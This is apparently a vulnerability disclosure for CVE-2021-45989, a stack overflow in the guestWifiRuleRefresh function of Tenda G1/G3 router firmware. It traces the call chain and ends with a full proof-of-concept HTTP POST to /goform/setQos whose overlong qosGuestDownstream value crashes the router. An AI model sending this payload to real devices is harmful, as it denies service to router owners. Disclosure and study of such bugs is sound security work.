Headline
CVE-2021-45989: my_vuln/4.md at main · pjqwudi/my_vuln
Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function guestWifiRuleRefresh. This vulnerability allows attackers to cause a Denial of Service (DoS) via the qosGuestUpstream and qosGuestDownstream parameters.
Tenda Vulnerability
Vendor:Tenda
Product:G1、G3
Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)
Type:Stack Overflow
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.
Stack Overflow
In httpd binary:
In guestWifiRuleRefresh function, qosGuestUpstream、qosGuestDownstream is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the qosGuestUpstream、qosGuestDownstream to crash the server.
There is a judgment logic in the function refreshMibItem, and one of the two inputs needs to be limited to a value of 0 to enter the vulnerability trigger point.
The function call chain:formQOSSet->guestWifiRuleRefresh
In formQOSSet function, Only when the value of flag is 1, the guestWifiRuleRefresh function will be called.
In setQosPolicy function, Only when the value of qosPolicy is the string "user", will the flag value be 1.
Supplement
In order to avoid such problems, we believe that the string content should be checked in the input extraction part.
PoC
We set qosGuestDownstream as aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa… , and the router will crash, such as:
POST /goform/setQos HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 653 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/qos/qosManage.html?0.5334447093236073 Cookie: _:USERNAME:_=; G3v3_user=
qosGuestUpstream=0&qosGuestDownstream=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&qosPolicy=user
Result
The target router crashes and cannot provide services correctly and persistently.